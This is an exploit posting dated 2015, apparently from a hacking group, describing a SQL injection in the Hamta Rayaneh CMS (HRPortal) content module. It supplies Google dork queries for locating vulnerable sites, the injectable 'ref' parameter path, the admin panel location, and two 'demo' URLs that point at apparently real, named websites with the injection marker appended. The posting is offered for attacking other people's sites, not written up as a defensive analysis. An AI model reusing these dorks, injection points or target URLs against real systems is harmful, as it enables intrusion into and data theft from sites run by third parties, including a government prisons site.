facebook facebook twitter rss

Hamta Rayaneh CMS Content Module SQL Injection vulnerability

Author: aMIr_MarG_BaR , Published: 04-04-2015
!---------------------------------------------------------!

Exploit Title : Hamta Rayaneh CMS Content Module SQL Injection vulnerability

Exploit Author : aMIr_MarG_BaR

yahoo: Amir_Marg_Barr

+ Google Dork : intext:Powered By HRPortal Valid CSS

+ Google Dork : intext:"Powered By HRPortal"

Tested on : Windows 8 , Windows XP

Version : 1

+---------------------------------------------------------+

+ Location :

/?modules=archive&portal=MainPortal&ref=[SQLi]

+ Panel Admin :

http://www.site.com/cp

+ Demo:

http://www.amoozeshdadkhr.ir/?modules=archive&portal=MainPortal&ref=2'

+ Demo 2 :

http://www.prisons-kh.ir/?portal=MainPortal&modules=content&ref=999'

!---------------------------------------------------------!

We Are : xX-AlibalA-Xx | Root3r | JOK3R | WH!T3 T!G3R

Iranian Exploit = [ 2015-04-04 ]

Like us on Facebook :